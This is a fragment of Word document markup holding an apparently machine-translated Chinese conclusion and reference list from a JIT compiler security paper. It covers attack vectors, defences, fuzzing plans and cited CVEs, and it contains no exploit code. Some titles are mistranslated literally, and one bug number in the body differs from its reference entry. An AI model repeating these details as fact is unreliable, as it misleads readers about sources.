      <w:pPr>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="0026102A">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1360" w:right="1020" w:bottom="280" w:left="1280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A32A5C1" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="62"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>结论与未来方向</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140DA6C5" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="38"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AC39C3F" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="474"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在我们研究的开始，即时编译器的广泛使用和流行比安全社区有机会对其进行分析的速度更快。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4DFE11" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:sz w:val="29"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6418C291" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="449"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>我们着手于更好地理解JIT编译的安全性，并从两个方面对其进行记录：JIT引擎易受攻击的攻击媒介以及可以实施的保护机制，以减少在开发中使用它们的风险。我们试图将精力更多地放在比较研究上，以便在此基础上进一步开展工作，而不是穷举开发人员所采用的技术。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24ED2033" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37F9111B" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1" w:line="283" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="449"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>我们发现的错误已经通过错误修复补丁和架构指导对Mozilla Firefox和LLVM等项目产生了直接而积极的影响。我们希望收集到的防御机制能够帮助即时编译器评估其安全性，更重要的是，将注意力集中在仔细审查其输入和环境的重要性上。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691204B5" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="734B9407" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="568"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>由于我们选择的主题很广，因此很难实现详尽的报道。一些编译器，例如</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JaegerMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和LLVM，我们试图深入描述它们的体系结构以及我们分析它们的方法。我们关注较少的其他方面，则是为将来的工作创建工具或简要描述其主要属性。其他一些，例如.NET CLR，为将来的分析留出了空间。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357ACF8C" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43790334" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="519"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">我们的计划包括继续和扩展我们的模糊工作，将其分配到更多机器上，并迭代语法实例化方法。我们正在考虑的一种方法涉及对同一规范的多个实现（例如多个JavaScript引擎，或带有LLVM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>VMKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的Oracle JVM实现）进行模糊处理，以分析其输出的差异。我们认为，这对于消除未定义的行为以及检测信息泄露错误非常有效，而众所周知，这些信息很难用模糊测试发现。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147CB776" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F96EDFB" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="449"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>我们认为，将来JIT安全问题的主要来源将是错误的机器代码发出，而不仅仅是利用JIT轻松滥用其内存许可或代码可预测性。代码发出错误并非总是归因于安全性问题（例如JVM JIT错误7056390 [5]），但可以直接导致可利用的条件。此类漏洞可以维护JIT引擎本身的完整性，但会产生错误的代码并直接导致可利用的条件。这些问题是潜在的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C346DEF" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="0026102A">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1360" w:right="1020" w:bottom="280" w:left="1280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="726A22B1" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:line="295" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="408"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>应该拥有自己的新型安全漏洞，但是我们将讨论留给更大的安全研究界。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC1DB55" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:line="363" w:lineRule="exact"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>参考资料</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="64082F9B" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="438"/>
        </w:tabs>
        <w:spacing w:before="356" w:line="271" w:lineRule="auto"/>
        <w:ind w:right="495" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">https://developer.mozilla.org/En/SpiderMonkey/Internals/Tracing_JIT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>TraceMonkey体系结构映像参考</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="29174485" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CAC7BC7" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="438"/>
        </w:tabs>
        <w:ind w:left="437" w:hanging="277"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId14">
        <w:r>
          <w:rPr>
            <w:sz w:val="20"/>
          </w:rPr>
          <w:t>http://blog.llvm.org/2010/04/intro-to-llvm-mc-project.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>LLVM机器代码项</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>目简介</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00157CDB" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53637EE7" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="438"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="437" w:hanging="277"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">https://bugzilla.mozilla.org/show_bug.cgi?id=635295 Mozilla Gmail </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>JavaScript错误</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2B08373E" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="753C0609" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="438"/>
        </w:tabs>
        <w:spacing w:line="271" w:lineRule="auto"/>
        <w:ind w:right="591" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId15">
        <w:r>
          <w:rPr>
            <w:spacing w:val="-1"/>
            <w:sz w:val="20"/>
          </w:rPr>
          <w:t>http://blogs.technet.com/b/srd/archive/2011/06/14/ms11-044-jit-compiler-issue-in-net-framework.aspx</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft .Net CLR </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>JIT逻辑错误</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1AC0702C" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="639C06D9" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="438"/>
        </w:tabs>
        <w:ind w:left="437" w:hanging="277"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId16">
        <w:r>
          <w:rPr>
            <w:sz w:val="20"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>http://bugs.sun.com/bugdatabase/view_bug.do?bug_id=7056380</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Java JIT代码发射漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BF9BE1" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:sz w:val="25"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18CBF9E8" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="438"/>
        </w:tabs>
        <w:spacing w:line="249" w:lineRule="auto"/>
        <w:ind w:right="787" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId17">
        <w:r>
          <w:rPr>
            <w:sz w:val="20"/>
          </w:rPr>
          <w:t>http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Paper.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Dion </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Blazakis的原始JIT喷纸</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="643EF3CC" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="5"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E1BD3FE" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="438"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="437" w:hanging="277"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId18">
        <w:r>
          <w:rPr>
            <w:sz w:val="20"/>
          </w:rPr>
          <w:t>http://cwe.mitre.org/data/definitions/733.html有</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>关编译器优化错误的CWE条目</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA08CEA" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="664ADE72" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="438"/>
        </w:tabs>
        <w:ind w:left="437" w:hanging="277"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId19">
        <w:r>
          <w:rPr>
            <w:sz w:val="20"/>
          </w:rPr>
          <w:t>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3766</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Firefox </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>nsDOMAttributeUse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>-After-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6144BBEA" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="30"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>免费漏洞</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="24E9ED8E" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D4B297E" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="438"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="437" w:hanging="277"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId20">
        <w:r>
          <w:rPr>
            <w:sz w:val="20"/>
          </w:rPr>
          <w:t>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0249</w:t>
        </w:r>
      </w:hyperlink>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IE“ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Aurora</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>”漏洞</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="07839680" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E316A2A" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="550"/>
        </w:tabs>
        <w:spacing w:line="271" w:lineRule="auto"/>
        <w:ind w:right="437" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId21">
        <w:r>
          <w:rPr>
            <w:sz w:val="20"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>http://cseweb.ucsd.edu/~hovav/papers/s07.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Hovav </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Shacham</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>骨头上纯真的肉的几何形状</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C2B9E8" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5162BB4B" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="535"/>
        </w:tabs>
        <w:ind w:left="534" w:hanging="374"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId22">
        <w:r>
          <w:rPr>
            <w:sz w:val="20"/>
          </w:rPr>
          <w:t>http://trailofbits.files.wordpress.com/2010/04/practical-rop.pdf-</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Dino Dai </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Zovi-实用ROP幻灯片</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="53B8070F" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55F3A9FB" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="550"/>
        </w:tabs>
        <w:spacing w:line="271" w:lineRule="auto"/>
        <w:ind w:right="861" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId23">
        <w:r>
          <w:rPr>
            <w:sz w:val="20"/>
          </w:rPr>
          <w:t>http://em386.blogspot.com/2010/06/its-2010-and-your-browser-has-assembler.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Chris</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Rohlf的原始</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>JIT代码重用研究</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCCF2B9" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74889CAA" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="550"/>
        </w:tabs>
        <w:ind w:left="549" w:hanging="389"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId24">
        <w:r>
          <w:rPr>
            <w:sz w:val="20"/>
          </w:rPr>
          <w:t>http://www.matasano.com/research/ragweed/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Matasano的Ragweed库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EF1088" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="695A0519" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="550"/>
        </w:tabs>
        <w:ind w:left="549" w:hanging="389"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId25">
        <w:r>
          <w:rPr>
            <w:sz w:val="20"/>
          </w:rPr>
          <w:t>http://www.matasano.com/research/nerve/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Matasano的Nerve调试器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D828C2A" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
